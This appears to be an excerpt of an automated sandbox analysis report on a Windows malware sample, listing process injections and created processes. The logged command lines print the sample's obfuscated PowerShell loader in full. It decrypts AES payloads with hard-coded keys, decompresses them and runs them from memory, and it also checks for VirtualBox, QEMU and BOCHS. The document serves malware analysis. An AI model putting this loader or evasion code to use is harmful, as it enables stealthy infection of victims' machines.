Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 390000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EC29790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25235280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21EC07B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 2527DEB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 286D7CE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EC29790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25235280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D547800000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21EC07B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 286D7CE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D547800000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 19192FE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 19193100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 29BC05B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1FAFFD50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2271B950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22735E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1DAF18C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1DAF1910000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2127EAE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 176E8750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CD8B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CF3050000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22735C40000

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\payload.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:gudwtndyxkts{param([outputtype([type])][parameter(position=0)][type[]]$eysutohjudxedh,[parameter(position=1)][type]$wayesupnic)$posiitcnxqz=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+'e'+'f'+[char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[char](100)+''+[char](68)+''+[char](101)+''+[char](108)+''+'e'+'g'+[char](97)+''+'t'+'e')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+''+'n'+''+'m'+''+'e'+''+[char](109)+'o'+[char](114)+''+'y'+'m'+[char](111)+''+[char](100)+''+[char](117)+''+[char](108)+''+[char](101)+'',$false).definetype(''+[char](77)+'y'+'d'+''+'e'+''+[char](108)+'e'+[char](103)+''+'a'+'t'+[char](101)+''+[char](84)+''+[char](121)+''+'p'+'e',''+[char](67)+''+[char](108)+''+[char](97)+'s'+[char](115)+''+[char](44)+''+'p'+''+'u'+''+[char](98)+''+[char](108)+'ic'+','+'s'+[char](101)+''+'a'+''+[char](108)+''+[char](101)+''+[char](100)+''+','+''+[char](65)+''+'n'+''+[char](115)+'i'+[char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[char](65)+''+[char](117)+'t'+'o'+''+'c'+''+'l'+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$posiitcnxqz.defineconstructor(''+[char](82)+''+[char](84)+''+'s'+''+[char](112)+''+[char](101)+'ci'+'a'+''+'l'+''+[char](78)+''+[char](97)+''+[char](109)+''+[char](101)+',h'+[char](105)+'d'+'e'+''+'b'+''+[char](121)+''+[char](83)+''+[char](105)+'g'+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+''+[char](108)+''+'i'+'c',[reflection.callingconventions]::standard,$eysutohjudxedh).setimplementationflags(''+[char](82)+'un'+[char](116)+''+'i'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+'n'+''+[char](97)+''+'g'+''+[char](101)+''+'d'+'');$posiitcnxqz.definemethod(''+'i'+''+'n'+'v'+[char](111)+''+[char](107)+''+'e'+'',''+[char](80)+''+[char](117)+''+[char](98)+''+[char](108)+''+[char](105)+''+[char](99)+''+','+''+[char](72)+''+[char](105)+''+'d'+''+'e'+''+[char](66)+''+[char](121)+''+[char](83)+''+'i'+''+[char](103)+''+[char](44)+''+'n'+''+[char](101)+''+'w'+''+[char](83)+''+[char](108)+'o'+[char](116)+''+','+''+[char](86)+''+[char](105)+''+[char](114)+''+'t'+'u'+[char](97)+'l',$wayesupnic,$eysutohjudxedh).setimplementationflags(''+[char](82)+'u'+[char](110)+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+'a'+'n'+''+'a'+''+[char](103)+'e'+'d'+'');write-output $posiitcnxqz.createtype();}$cxukrbomemwqm=([appdomain]::currentdomain.getassemblies()\|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+'ys'+'t'+''+[char](101)+''+'m'+'.d'+[char](108)+''+[char](108)+'')}).gettype(''+'m'+''+[char](105)+'c'+[char](114)+''+[char](111)+''+[char](115)+''+[char](111)+''+'f'+'t'+[char](46)+''+[char](87)+''+[char](105)+''+'n'+''+[char](51)+''+[char](50)+''+'.'+''+'u'+''+[char](110)+''+[char](115)+''+[char](97)+''+[
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', 